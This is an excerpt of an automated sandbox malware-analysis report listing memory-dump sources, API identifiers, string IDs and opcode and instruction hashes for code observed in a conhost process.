        • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
        • Instruction ID: 8e7788310e82ba04ae43e17f296f8da0f534e254cb9e6b00d9af8c0bee487296
        • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
        • Instruction Fuzzy Hash: 885172329007D09BEB788F9995443987FA2FB54B94F14413AEEC947B96C7BCC652C702
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000013.00000003.2617755503.0000013F081C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000013F081C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_19_3_13f081c0000_conhost.jbxd
        Similarity
        • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
        • String ID: csm$csm
        • API String ID: 3896166516-3733052814
        • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
        • Instruction ID: 39599bd1708f2b5cd30f498ff7cd7bed36b855209c2b8c61c54cfed82af4a826
        • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
        • Instruction Fuzzy Hash: E751B272A047948AEB788F19D1443987FA2FF54BD4FA44139FA8947BD6CB38C662C701
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000013.00000002.3055761550.0000013F08E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E60000, based on PE: true
        • Associated: 00000013.00000002.3055284000.0000013F08E60000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3056628998.0000013F08E75000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3057143026.0000013F08E80000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3057445918.0000013F08E82000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3057817933.0000013F08E89000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_19_2_13f08e60000_conhost.jbxd
        Similarity
        • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
        • String ID: pid_
        • API String ID: 517849248-4147670505
        • Opcode ID: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
        • Instruction ID: 8851abfa062d18bdae6a9fe66041635ba81dad6582a7564f810ce9d758d7d578
        • Opcode Fuzzy Hash: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
        • Instruction Fuzzy Hash: CD114231714781A1EB289BA9EC003DA6AA6F7547C4F944039FA498379AEF6CCA57C701
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000013.00000002.3058635336.0000013F08E91000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E90000, based on PE: true
        • Associated: 00000013.00000002.3058223651.0000013F08E90000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3059184218.0000013F08EA5000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3059730149.0000013F08EB0000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3060239866.0000013F08EB2000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3060760816.0000013F08EB9000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_19_2_13f08e90000_conhost.jbxd
        Similarity
        • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
        • String ID: pid_
        • API String ID: 517849248-4147670505
        • Opcode ID: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
        • Instruction ID: b04f3e8386181e5b20b62bed1de67d63b439c2ff1e73b65880a6fe0abd7df61f
        • Opcode Fuzzy Hash: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
        • Instruction Fuzzy Hash: 3E11B7717107C191EB189BA9EC003DA6AA6F784740F905039FE8983796EFECCA47C701
        APIs
        Memory Dump Source
        • Source File: 00000013.00000002.3055761550.0000013F08E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E60000, based on PE: true
        • Associated: 00000013.00000002.3055284000.0000013F08E60000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3056628998.0000013F08E75000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3057143026.0000013F08E80000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3057445918.0000013F08E82000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3057817933.0000013F08E89000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_19_2_13f08e60000_conhost.jbxd
        Similarity
        • API ID: FileWrite$ConsoleErrorLastOutput
        • String ID:
        • API String ID: 2718003287-0
        • Opcode ID: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
        • Instruction ID: 600ee3f02dcb8055d3b60fcc835ec16438250af409e2a2cb5bb1ed086c4a0ed4
        • Opcode Fuzzy Hash: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
        • Instruction Fuzzy Hash: F2D1D432B14B8489E725CFA9D4406DC3BB2F355B98F44412AEF5E97B9ADA38C607C341
        APIs
        Memory Dump Source
        • Source File: 00000013.00000002.3058635336.0000013F08E91000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E90000, based on PE: true
        • Associated: 00000013.00000002.3058223651.0000013F08E90000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3059184218.0000013F08EA5000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3059730149.0000013F08EB0000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3060239866.0000013F08EB2000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3060760816.0000013F08EB9000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_19_2_13f08e90000_conhost.jbxd
        Similarity
        • API ID: FileWrite$ConsoleErrorLastOutput
        • String ID:
        • API String ID: 2718003287-0
        • Opcode ID: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
        • Instruction ID: cde9fd009a7ff3618527fb6698e0f7321ec57e0de63fa29b1cdae0cfad8ed5a8
        • Opcode Fuzzy Hash: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
        • Instruction Fuzzy Hash: DDD1DF32B14A8489E715CFA9D4402DC7BB2F355B98F40422AEF5DA7B9ADA38D607C341
        APIs
        Memory Dump Source
        • Source File: 00000013.00000002.3055761550.0000013F08E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E60000, based on PE: true
        • Associated: 00000013.00000002.3055284000.0000013F08E60000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3056628998.0000013F08E75000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3057143026.0000013F08E80000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3057445918.0000013F08E82000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3057817933.0000013F08E89000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_19_2_13f08e60000_conhost.jbxd
        Similarity
        • API ID: Heap$Process$Free
        • String ID:
        • API String ID: 3168794593-0
        • Opcode ID: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
        • Instruction ID: a66a3545d5a6d4bd225cf5ffdf89d922247d5a0f69416c75abf11392211e0378
        • Opcode Fuzzy Hash: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
        • Instruction Fuzzy Hash: E401ED72A10F90DAE728DFAAE8041997BA2F788F81F054039EF5953715DF38D552C741
        APIs
        Memory Dump Source
        • Source File: 00000013.00000002.3058635336.0000013F08E91000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E90000, based on PE: true
        • Associated: 00000013.00000002.3058223651.0000013F08E90000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3059184218.0000013F08EA5000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3059730149.0000013F08EB0000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3060239866.0000013F08EB2000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3060760816.0000013F08EB9000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_19_2_13f08e90000_conhost.jbxd
        Similarity
        • API ID: Heap$Process$Free
        • String ID:
        • API String ID: 3168794593-0
        • Opcode ID: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
        • Instruction ID: ced7286513d41188816326cbfd7ea7e4ad1db75b67b362e3fd5245e2e673ed5d
        • Opcode Fuzzy Hash: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
        • Instruction Fuzzy Hash: 1401DB32A10E90DAD718DFAAA804199BBA2F798F80F054039EF4953715DE38E552C741
        APIs
        • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,0000013F08E728DF), ref: 0000013F08E72A12
        Memory Dump Source
        • Source File: 00000013.00000002.3055761550.0000013F08E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E60000, based on PE: true
        • Associated: 00000013.00000002.3055284000.0000013F08E60000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3056628998.0000013F08E75000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3057143026.0000013F08E80000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3057445918.0000013F08E82000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3057817933.0000013F08E89000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_19_2_13f08e60000_conhost.jbxd
        Similarity
        • API ID: ConsoleMode
        • String ID:
        • API String ID: 4145635619-0
        • Opcode ID: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
        • Instruction ID: d8de083f809c2ca5a378a80122898953553e7709b4b572cf3872883f370c03fe
        • Opcode Fuzzy Hash: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
        • Instruction Fuzzy Hash: B991B232E1065089FB788FA9D4507ED2FA2F355B98F44412EEF4B57A86DA38C647C302
        APIs
        • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,0000013F08EA28DF), ref: 0000013F08EA2A12
        Memory Dump Source
        • Source File: 00000013.00000002.3058635336.0000013F08E91000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E90000, based on PE: true
        • Associated: 00000013.00000002.3058223651.0000013F08E90000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3059184218.0000013F08EA5000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3059730149.0000013F08EB0000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3060239866.0000013F08EB2000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3060760816.0000013F08EB9000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_19_2_13f08e90000_conhost.jbxd
        Similarity
        • API ID: ConsoleMode
        • String ID:
        • API String ID: 4145635619-0
        • Opcode ID: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
        • Instruction ID: d320d04904f436c8830756ca8227744d6848f23de830d1beacbc14de4d0b7da7
        • Opcode Fuzzy Hash: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
        • Instruction Fuzzy Hash: 1091D432E1065085FB588FA994503EDBFA2F754F98F44412DEF4A77A86DA38D647C302
        APIs
        Memory Dump Source
        • Source File: 00000013.00000002.3055761550.0000013F08E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E60000, based on PE: true
        • Associated: 00000013.00000002.3055284000.0000013F08E60000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3056628998.0000013F08E75000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3057143026.0000013F08E80000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3057445918.0000013F08E82000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3057817933.0000013F08E89000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_19_2_13f08e60000_conhost.jbxd
        Similarity
        • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
        • String ID:
        • API String ID: 2933794660-0
        • Opcode ID: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
        • Instruction ID: 266d3604cd7dd3e89fb3535f503f1e15404e779cfc998b5bc1f069540c451a03
        • Opcode Fuzzy Hash: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
        • Instruction Fuzzy Hash: 14112A36B10F048AEB14CFA4E8543A837A4F719758F440E39EA6D867A5DF7CC2598341
        APIs
        Memory Dump Source
        • Source File: 00000013.00000002.3058635336.0000013F08E91000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E90000, based on PE: true
        • Associated: 00000013.00000002.3058223651.0000013F08E90000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3059184218.0000013F08EA5000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3059730149.0000013F08EB0000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3060239866.0000013F08EB2000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3060760816.0000013F08EB9000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_19_2_13f08e90000_conhost.jbxd
        Similarity
        • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
        • String ID:
        • API String ID: 2933794660-0
        • Opcode ID: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
        • Instruction ID: 5fc103146525c195a7460e15310a4157ebef3640437e949110bc2d8db5a964ec
        • Opcode Fuzzy Hash: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
        • Instruction Fuzzy Hash: 57112736B10F048AEB04CFA4E8543E937B4F719B68F440E39EA6D867A5EB7CD2558341
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000013.00000002.3055761550.0000013F08E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E60000, based on PE: true
        • Associated: 00000013.00000002.3055284000.0000013F08E60000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3056628998.0000013F08E75000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3057143026.0000013F08E80000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3057445918.0000013F08E82000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3057817933.0000013F08E89000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_19_2_13f08e60000_conhost.jbxd
        Similarity
        • API ID: FileType
        • String ID: \\.\pipe\
        • API String ID: 3081899298-91387939
        • Opcode ID: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
        • Instruction ID: d89f53054dcc15233e436f1778a593f30427a2cf1bed7bf1430256c31fa1da79
        • Opcode Fuzzy Hash: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
        • Instruction Fuzzy Hash: 9E71A332A10B8181E73C9FAE98443EA6B96F3957D4F44403EEE4953B8ADE79C712C701
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000013.00000002.3058635336.0000013F08E91000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E90000, based on PE: true
        • Associated: 00000013.00000002.3058223651.0000013F08E90000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3059184218.0000013F08EA5000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3059730149.0000013F08EB0000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3060239866.0000013F08EB2000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3060760816.0000013F08EB9000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_19_2_13f08e90000_conhost.jbxd
        Similarity
        • API ID: FileType
        • String ID: \\.\pipe\
        • API String ID: 3081899298-91387939
        • Opcode ID: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
        • Instruction ID: fbd15f751a32ca33cf977586ac6102e0d18958a5453ed86a9bd943862890d614
        • Opcode Fuzzy Hash: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
        • Instruction Fuzzy Hash: A371B736A007C151EB7C9FAE98543EA6B96F345B94F40403AFE9943B86DEB9C702C701
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000013.00000003.2617755503.0000013F081C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000013F081C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_19_3_13f081c0000_conhost.jbxd
        Similarity
        • API ID: CurrentImageNonwritable__except_validate_context_record
        • String ID: csm
        • API String ID: 3242871069-1018135373
        • Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
        • Instruction ID: 08c7ba7983eea97fc99f2f09eca11af2549d3dca7f5dc07ff2d29dca2c3586f0
        • Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
        • Instruction Fuzzy Hash: 9051DB32B21A008ADB5CCF1DD488BAD3B93FB44B95FA54139FA5A47786D778D942C700
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000013.00000003.2617755503.0000013F081C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000013F081C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_19_3_13f081c0000_conhost.jbxd
        Similarity
        • API ID: CallTranslator
        • String ID: MOC$RCC
        • API String ID: 3163161869-2084237596
        • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
        • Instruction ID: 6dd8f896749ead0f3972c5345b51d00b35986c4aca2a55f649bb31c96a55fab9
        • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
        • Instruction Fuzzy Hash: 9361C332908BC481D7748F19E4407DABFA1FB85B98F544229FB9817B96DB7CC291CB00
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000013.00000002.3055761550.0000013F08E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E60000, based on PE: true
        • Associated: 00000013.00000002.3055284000.0000013F08E60000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3056628998.0000013F08E75000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3057143026.0000013F08E80000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3057445918.0000013F08E82000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3057817933.0000013F08E89000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_19_2_13f08e60000_conhost.jbxd
        Similarity
        • API ID: FileType
        • String ID: \\.\pipe\
        • API String ID: 3081899298-91387939
        • Opcode ID: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
        • Instruction ID: b4b58d1c2b72eae466f3a76b62a051c68817fcf0eeed34b614ad6f3307ace2b3
        • Opcode Fuzzy Hash: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
        • Instruction Fuzzy Hash: AF512936A0478185EA2C9EADA4587EA6F53F3857E0F04003DEF5943B8BDA3DD612C742
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000013.00000002.3058635336.0000013F08E91000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E90000, based on PE: true
        • Associated: 00000013.00000002.3058223651.0000013F08E90000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3059184218.0000013F08EA5000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3059730149.0000013F08EB0000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3060239866.0000013F08EB2000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3060760816.0000013F08EB9000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_19_2_13f08e90000_conhost.jbxd
        Similarity
        • API ID: FileType
        • String ID: \\.\pipe\
        • API String ID: 3081899298-91387939
        • Opcode ID: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
        • Instruction ID: 28921b8b6e6a0b3ef2da58af08ca0a79d02deccbf86d4597586aa48eb95b67f6
        • Opcode Fuzzy Hash: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
        • Instruction Fuzzy Hash: 9A51D736A047C151EE2CCEADA4543EA6E53F385B44F54003DEEA953B8BDABDC606C741
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000013.00000002.3055761550.0000013F08E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E60000, based on PE: true
        • Associated: 00000013.00000002.3055284000.0000013F08E60000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3056628998.0000013F08E75000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3057143026.0000013F08E80000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3057445918.0000013F08E82000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3057817933.0000013F08E89000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_19_2_13f08e60000_conhost.jbxd
        Similarity
        • API ID: ErrorFileLastWrite
        • String ID: U
        • API String ID: 442123175-4171548499
        • Opcode ID: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
        • Instruction ID: ba51a26a6b4c4ac527bf48cd19eaf96d8a1271236b2117ff3b18072a7037b621
        • Opcode Fuzzy Hash: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
        • Instruction Fuzzy Hash: 2941F932A15A8086E764CFA9E4447D9BBA2F348794F90413AFF4D87759EB3CC642C741
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000013.00000002.3058635336.0000013F08E91000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E90000, based on PE: true
        • Associated: 00000013.00000002.3058223651.0000013F08E90000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3059184218.0000013F08EA5000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3059730149.0000013F08EB0000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3060239866.0000013F08EB2000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3060760816.0000013F08EB9000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_19_2_13f08e90000_conhost.jbxd
        Similarity
        • API ID: ErrorFileLastWrite
        • String ID: U
        • API String ID: 442123175-4171548499
        • Opcode ID: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
        • Instruction ID: e6b9c866c4e5c52688ba7d83f54ae4432361f971b725623edd349ea0ddf03abd
        • Opcode Fuzzy Hash: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
        • Instruction Fuzzy Hash: 7441F472A15A8086E754CFA9E4443DABBA6F388B80F404039FF4D97759EB3CD602C741
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000013.00000002.3055761550.0000013F08E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E60000, based on PE: true
        • Associated: 00000013.00000002.3055284000.0000013F08E60000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3056628998.0000013F08E75000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3057143026.0000013F08E80000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3057445918.0000013F08E82000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3057817933.0000013F08E89000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_19_2_13f08e60000_conhost.jbxd
        Similarity
        • API ID: ExceptionFileHeaderRaise
        • String ID: csm
        • API String ID: 2573137834-1018135373
        • Opcode ID: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
        • Instruction ID: c2fe5a2b06baf2bb84484fe11f47b52419933160ad8600700eb755cce1005a52
        • Opcode Fuzzy Hash: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
        • Instruction Fuzzy Hash: D8113332614B4082EB258F19F4442997BE6F788B94F694225EECD0776ADF3CC652CB00
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000013.00000002.3058635336.0000013F08E91000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E90000, based on PE: true
        • Associated: 00000013.00000002.3058223651.0000013F08E90000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3059184218.0000013F08EA5000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3059730149.0000013F08EB0000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3060239866.0000013F08EB2000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3060760816.0000013F08EB9000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_19_2_13f08e90000_conhost.jbxd
        Similarity
        • API ID: ExceptionFileHeaderRaise
        • String ID: csm
        • API String ID: 2573137834-1018135373
        • Opcode ID: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
        • Instruction ID: b685c277dccc3ce888cd87ed86701a972d08f69cdc049bfcd86ebf6f17d8bdd1
        • Opcode Fuzzy Hash: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
        • Instruction Fuzzy Hash: BA115132614B8082DB148B59F404289BBE2F788B84F594228EECD0775AEF7CC652C700
        APIs
        Memory Dump Source
        • Source File: 00000013.00000002.3055761550.0000013F08E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E60000, based on PE: true
        • Associated: 00000013.00000002.3055284000.0000013F08E60000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3056628998.0000013F08E75000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3057143026.0000013F08E80000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3057445918.0000013F08E82000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3057817933.0000013F08E89000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_19_2_13f08e60000_conhost.jbxd
        Similarity
        • API ID: Heap$Process$AllocFree
        • String ID:
        • API String ID: 756756679-0
        • Opcode ID: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
        • Instruction ID: a593c1f2405ce7dc247d6a2b3c562d80240cb724859ed7369ce98e381d0eaac4
        • Opcode Fuzzy Hash: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
        • Instruction Fuzzy Hash: FB116131A01F8085EA19CBAAE4042997BA2F788FD1F584138EE4E53766DF3CD5538300
        APIs
        Memory Dump Source
        • Source File: 00000013.00000002.3058635336.0000013F08E91000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E90000, based on PE: true
        • Associated: 00000013.00000002.3058223651.0000013F08E90000.00000002.00001000.00020000.00000000.sdmpDownload File
